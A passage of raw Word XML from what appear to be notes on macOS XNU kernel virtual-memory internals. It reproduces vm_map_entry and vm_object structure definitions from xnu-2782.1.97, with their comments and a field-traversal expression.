        <w:t>vme_creation_maphdr</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uintptr_t       vme_creation_bt</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16</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endif</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAP_ENTRY_INSERTION_DEBUG</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    uintptr_t       vme_insertion_bt</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="002F720D" w:rsidRDefault="007368EC" w:rsidP="002F720D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4447" w:rsidRPr="007368EC" w:rsidRDefault="00DC4447" w:rsidP="002F720D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">vm </w:t>
      </w:r>
      <w:r w:rsidR="00DF0799">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF0799" w:rsidRPr="00CA74C4" w:rsidRDefault="00CA74C4" w:rsidP="00CA74C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425" w:firstLine="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>object = proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>task.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next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40F2B" w:rsidRPr="003724A2" w:rsidRDefault="00B40F2B" w:rsidP="003724A2">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003724A2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\vm\vm_object.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40F2B" w:rsidRPr="00B40F2B" w:rsidRDefault="00B40F2B" w:rsidP="00B40F2B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>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vm_object </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queue_head_t        memq</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Resident memory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lck_rw_t        Lock</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Synchronization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ion</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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m_object_size_t  vou_size</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 size (only valid if internal)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vou_cache_pages_to_scan</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ages yet to be visited in an</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external object in cach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 xml:space="preserve"> vo_un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vm_page      </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>memq_hint</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ref_coun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Number of references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TASK_SWAPPER</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res_coun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Residency references (swap)*/</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TASK_SWAPPER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resident_page_count</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number of resident pages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wired_page_coun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number of wired pages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reusable_page_count</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vm_object    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>copy</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 that should receiv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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                         * a copy of my changed page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for copy_delay, or just th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emporary object tha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shadows this object, fo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opy_call.</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Cs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vm_object    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* My shadow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ion</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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m_object_offset_t vou_shadow_offse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ffset into shadow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clock_sec_t vou_cache_ts</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age of an external objec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resent in cach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task_t      vou_purgeable_owner</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xml:space="preserve">/* If the purg'a'ble bits below are set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o volatile/emtpy, this is the task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hat owns this purgeable objec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vm_shared_region_slide_info </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vou_slide_info</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 xml:space="preserve"> vo_un2</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memory_object_t     </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD72D9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pager</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Where to get data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m_object_offset_t  paging_offse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ffset into memory objec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memory_object_control_t pager_control</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Where data comes back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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    memory_object_copy_strategy_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copy_strategy</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How to handle data copy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__LP64__</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Some user processes (mostly VirtualMachine software) take a larg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number of UPLs (via IOMemoryDescriptors) to wire pages in larg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VM objects and overflow the 16-bit "activity_in_progress" counte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Since we never enforced any limit there, let's give them 32 bit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for backwards compatibility's sak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paging_in_progress</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16</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__object1_unused_bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16</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activity_in_progres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lse</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__LP64__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On 32-bit platforms, enlarging "activity_in_progress" would increas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he size of "struct vm_object".  Since we don't know of any actual</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overflow of these counters on these platforms, let's keep th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ounters as 16-bit integers.</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hort</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      paging_in_progres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hort</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      activity_in_progres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__LP64__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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* The memory object ports ar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being used (e.g., for pagein</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or pageout) -- don't chang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ny of these fields (i.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don't collapse, destroy o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erminat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array */</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   all_wanted</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1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it array of "want to b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wakened" notations.  Se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VM_OBJECT_EVENT_* items</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below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ager_creat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Has pager been created?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ager_initializ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Are fields ready to us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ager_ready</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Will pager take requests?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ager_trust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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* The pager for this objec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is trusted. This is true fo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ll internal objects (backed</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by the default pager)</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can_persist</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The kernel may keep the data</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for this object (and right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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                         * to the memory object) afte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ll address map references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re deallocated?</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internal</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Created by the kernel (and</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herefore, managed by th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default memory manger)</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temporary</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ermanent objects may b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hanged externally by th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memory manager, and change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made in memory must b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reflected back to the memor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manager.  Temporary object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lack both of thes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haracteristics.</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privat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magic device_pager objec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holds private pages only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ageout</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ageout object. contain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rivate pages that refer to</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a real memory objec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aliv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Not yet terminated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lastRenderedPageBreak/>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urgable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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urgable state.  Se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VM_PURGABLE_*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urgeable_when_rip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urgeable when a token</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becomes rip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shadow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Shadow may exis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advisory_pageout</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Instead of sending pag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via OOL, just notif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ager that the kernel</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wants to discard it, pag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remains in objec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true_shar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This object is mapped</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in more than one plac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nd hence cannot b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coalesced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terminating</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Allows vm_object_lookup</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nd vm_object_deallocat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o special case thei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behavior when they ar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alled as a result of</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                         * page cleaning during</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object termination</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nam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An enforces an internal</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naming convention, b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alling the right routine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for allocation and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destruction, UBC reference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gainst the vm_object ar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hecked.</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shadow_sever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xml:space="preserve">/* When a permanent object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backing a COW goes awa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unexpectedly.  This bi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llows vm_fault to return</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n error rather than a</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zero filled pag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phys_contiguous</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Memory is wired and</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guaranteed physically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contiguous.  Howeve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it is not device memor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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                         * and obeys normal virtual</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memory rules w.r.t pmap</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access bits.</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oolean_t */</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     nophyscach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xml:space="preserve">/* When mapped at th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map level, don't allow</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rimary caching. (for</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I/O)</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queue_chain_t       cached_lis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Attachment point for th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list of objects cached as a</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result of their can_persis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valu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queue_head_t        msr_q</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memory object synchronis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request queue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the following fields are not protected by any lock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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   * they are updated via atomic compare and swap</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m_object_offset_t  last_alloc</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last allocation offse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r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         sequential</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sequential access size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uint32_t        pages_created</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uint32_t        pages_used</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MACH_PAGEMAP</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vm_external_map_t   existence_map</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bitmap of pages written to</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 backing storag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MACH_PAGEMAP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m_offset_t     cow_hin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last page present in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shadow but not in object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MACH_ASSER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vm_object    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>paging_object</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 which pages to b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swapped out are temporary</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put in current objec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hold object lock when altering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unsigned</w:t>
      </w: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in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img_bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8</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cache WIMG bits         */</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       </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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        code_sign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ages are signed and should be</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validated; the signatures are stored</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                       with the pager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hash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pager entered in hash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transpose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 was transposed with another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mapping_in_progress</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pager being mapped/unmapped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phantom_isss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olatile_empty</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volatile_fault</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all_reusable</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blocked_access</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set_cache_attr</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object_slid</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purgeable_queue_type</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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purgeable_queue_group</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</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io_tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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__object2_unused_bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7</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for expansion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uint32_t        scan_collision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CONFIG_PHANTOM_CACHE</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uint32_t        phantom_object_id</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CONFIG_IOSCHED </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> UPL_DEBUG</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queue_head_t        uplq</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List of outstanding upls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lastRenderedPageBreak/>
        <w:t>#ifdef</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  VM_PIP_DEBUG</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Keep track of the stack traces for the first holders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40F2B" w:rsidRPr="00B40F2B" w:rsidRDefault="00B40F2B" w:rsidP="00B40F2B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * of a "paging_in_progress" reference for this VM objec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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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define</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM_PIP_DEBUG_STACK_FRAMES   </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>25</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depth of each stack trac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define</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM_PIP_DEBUG_MAX_REFS       </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</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track that many references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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> __pip_backtrace </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void</w:t>
      </w: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pip_retaddr</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VM_PIP_DEBUG_STACK_FRAME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 xml:space="preserve"> pip_holders</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
